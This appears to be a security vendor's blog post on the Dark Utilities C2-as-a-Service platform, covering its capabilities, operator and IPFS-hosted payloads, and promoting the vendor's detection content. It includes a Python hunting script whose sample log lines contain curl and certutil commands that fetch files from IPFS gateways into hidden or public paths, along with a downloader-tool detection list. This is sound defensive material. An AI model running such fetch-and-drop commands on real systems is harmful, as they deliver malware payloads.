Dark Utilities “C2aaS” Platform: Provides Adversaries With a Vast Array of C2 Capabilities

Dark Utilities Platform

A C2 platform called “Dark Utilities” was released in early 2022 and is currently gaining traction among adversaries. Dark Utilities, a C2-as-a-Service (C2aaS), provides an affordable way (starting at just EUR 9,99) of setting up anonymous C&C infrastructure without building any of it yourself.

The service allows for remote access, DDoS attacks, command execution, and cryptojacking on compromised hosts. Security researchers report that the service already has about 3,000 users.

Detect Malware Attacks Leveraging Dark Utilities

Detect suspicious Dark Utilities activity by its command-line execution with a Sigma rule newly released to the Threat Detection Marketplace of the SOC Prime Platform. The detection was contributed by our top-tier Threat Bounty developer Onur Atali:

Dark Utilities ‘C2aaS’ Platform in Malware Campaigns Detect (via cmdline)

The rule is aligned with the MITRE ATT&CK® framework v.10, addressing the Execution tactic with Command and Scripting Interpreter (T1059) as the main technique.

Deeply skilled Threat Hunters are welcome to register with the SOC Prime Platform to access the benefits of the only Threat Detection Marketplace where researchers monetize their content.

If you have not registered with the Platform yet but would still like to give our threat detection content a try, see what is available with the Cyber Threats Search Engine. Browse a rich collection of Sigma rules with relevant threat context, CTI, and MITRE ATT&CK references, registration-free. Hit the Explore Threat Context button to drive better detection.

While cybercrooks search for new means of turning up the heat, SOC Prime's team of content contributors works hard on a vast repository of detection content, following time-tested Detection-as-Code best practices. Verified users have access to 200K+ detection algorithms and threat hunting queries aligned with 26+ industry-leading SIEM, EDR, and XDR solutions. Press the Detect & Hunt button to access the industry-leading library of Sigma and YARA rules and comb through your security data with more efficiency and agility.


Who Is Behind Dark Utilities?

Available evidence suggests that the mastermind behind this service is a threat actor known under the nickname Inplex-sys, who is most likely located in Europe. Researchers from Cisco Talos also found traces of the operator's collaboration with the Smart Bot project.

Dark Utilities Payload Analysis

The Dark Utilities platform operators have made customer service their calling card. Platform users are offered an intuitive dashboard and an admin panel for executing commands on compromised devices. Additionally, the service provides a variety of ways to further leverage the acquired access. Upon the platform's release in 2022, the operators also launched Discord and Telegram communities for customer support.

The C2aaS platform operators offer malicious payloads designed to target multiple architectures. The payloads are stored in the Interplanetary File System (IPFS), a peer-to-peer network for storing and sharing data in a distributed, content-addressed file system. Because an IPFS object is fetched by the hash of its content (its CID) through any node or public gateway rather than from one server, taking down a single host does not remove the payload, which is the practical reason the hosting choice matters to defenders.
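The marketplace rule referenced above is not reproduced on this page, so the following is an added example of the kind of command-line check the two passages point at, not SOC Prime's rule and not code from the Dark Utilities authors. It applies a Sigma-style selection to constructed process-creation log lines: a download tool or script interpreter pulling an object from an IPFS gateway path. The `key=value` log format, the gateway hostnames, the CID strings, and the list of downloader images are all assumptions made for the illustration.

```python
import re
from typing import Dict, List

# Added example, not the SOC Prime marketplace rule: a Sigma-style
# process-creation check that flags command-line tools fetching an object
# from an IPFS gateway. Dark Utilities stages its payloads on IPFS, so a
# download tool or interpreter (T1059) pulling a bare CID is a useful
# command-line pivot for hunting.

# Hypothetical "key=value" process-creation log format, constructed for this example.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Gateway-style IPFS/IPNS object path: .../ipfs/<CID>. CIDv0 is 46 characters
# and base32 CIDv1 is longer, so 40+ alphanumerics keeps short look-alike paths out.
IPFS_URL = re.compile(r"https?://[^\s\"']+/ip[fn]s/(?P<cid>[A-Za-z0-9]{40,})", re.IGNORECASE)

# Image basenames (prefix match) that do not normally talk to IPFS on an endpoint.
# A browser hitting a gateway is routine and is deliberately not listed.
DOWNLOADERS = ("curl", "wget", "python", "powershell", "pwsh", "certutil", "bitsadmin")

# Constructed CID-shaped strings (correct length and alphabet, not real objects).
CID_V0 = "Qm" + "ConstructedCidFortheExampleOnlyNotRealObject"
CID_V1 = "bafy" + "beiconstructedcidfortheexampleonlynotarealobject"

# Constructed sample events: three gateway fetches by download tools, one browser
# visit to a gateway, and one ordinary download from a non-IPFS host.
EVENTS = [
    f'host=ws01 user=alice image=/usr/bin/curl cmdline="curl -s https://ipfs.io/ipfs/{CID_V0} -o /tmp/.x"',
    'host=ws02 user=bob image=/usr/bin/wget cmdline="wget https://example.com/update.tar.gz -O /tmp/update.tar.gz"',
    f'host=ws03 user=svc image=/usr/bin/python3 cmdline="python3 /tmp/fetch.py https://cloudflare-ipfs.com/ipfs/{CID_V1} /tmp/.a"',
    f'host=ws04 user=carol image=/usr/bin/firefox cmdline="firefox https://ipfs.io/ipfs/{CID_V0}"',
    rf'host=win01 user=dave image=C:\Windows\System32\certutil.exe cmdline="certutil -urlcache -split -f https://dweb.link/ipfs/{CID_V1} C:\Users\Public\x.exe"',
]


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value log line into a field dict; quoted values may contain spaces."""
    return {key: quoted or bare for key, quoted, bare in KV.findall(line)}


def is_ipfs_fetch(event: Dict[str, str]) -> bool:
    """Selection: downloader/interpreter image AND an IPFS gateway object path in the command line."""
    image = event.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    return image.startswith(DOWNLOADERS) and IPFS_URL.search(event.get("cmdline", "")) is not None


def hunt(lines: List[str]) -> List[Dict[str, str]]:
    """Run the selection over raw log lines and return one hit per match with the CID extracted."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if not is_ipfs_fetch(event):
            continue
        match = IPFS_URL.search(event["cmdline"])
        hits.append({
            "host": event.get("host", "?"),
            "user": event.get("user", "?"),
            "image": event["image"],
            "cid": match.group("cid"),
        })
    return hits


if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(f"{hit['host']} {hit['user']} {hit['image']} cid={hit['cid']}")
```

The CID extracted from each hit is the pivot worth keeping: the same object hash will appear in every gateway URL the operators rotate through, so it survives hostname changes in a way a plain URL indicator does not.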

The Dark Utilities operators offer adversaries one of the best value-for-money deals around: the platform's rich functionality at relatively low cost. Users can target various systems, establish a C2 communications channel, and achieve persistence with little to no development skill.

SOC Prime's team of professionals implements defense-in-depth strategies to deliver the best results in threat detection. Register on the SOC Prime Platform to augment your proactive and retrospective threat hunting and detect in time any cyber punches landing within your company's security environment.
